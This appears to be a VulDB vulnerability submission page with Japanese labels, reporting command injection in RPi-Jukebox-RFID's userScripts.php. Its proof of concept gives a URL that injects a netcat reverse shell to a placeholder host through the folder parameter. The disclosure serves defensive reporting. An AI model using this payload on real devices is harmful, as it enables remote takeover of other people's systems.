| タイトル | miczflor rpi-jukebo 1.0 Remote code execution via web application in miczflor/rpi-jukebo |
|---|
| 説明 | Remote code execution via web application in miczflor/rpi-jukebox-rfid
0
Description
The provided PHP code contains a critical security vulnerability that can lead to Remote Code Execution (RCE) attacks. The vulnerability arises due to insufficient input validation and improper handling of user-supplied data. An attacker can exploit this vulnerability to execute arbitrary commands on the server, potentially compromising the entire system's security.
Proof of Concept (PoC):
An attacker can exploit the vulnerability by manipulating the folder and folderNew parameters in the URL query string to inject malicious commands. Here is a simplified example of the PoC:
Craft The URL for the device:
http://example.com/userScripts.php?folder=;nc x.x.x.x 4444 -e /bin/bash;&folderNew=test
When the PHP code executes the command, it becomes:
sudo /path/to/userscripts/;nc x.x.x.x 4444 -e /bin/bash; test
both parameters in the GET and POST request method is vulnerable and need to be sanitized |
|---|
| ソース | ⚠️ https://github.com/MiczFlor/RPi-Jukebox-RFID/blob/0bb38334d6d0fad47b95235ffc466d8d9530144d/htdocs/userScripts.php#L67 |
|---|
| ユーザー | torada (UID 61170) |
|---|
| 送信 | 2024年01月09日 23:41 (2 年 ago) |
|---|
| モデレーション | 2024年01月19日 08:00 (9 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 251540 [MiczFlor RPi-Jukebox-RFID 迄 2.5.0 HTTP Request userScripts.php folder 特権昇格] |
|---|
| ポイント | 20 |
|---|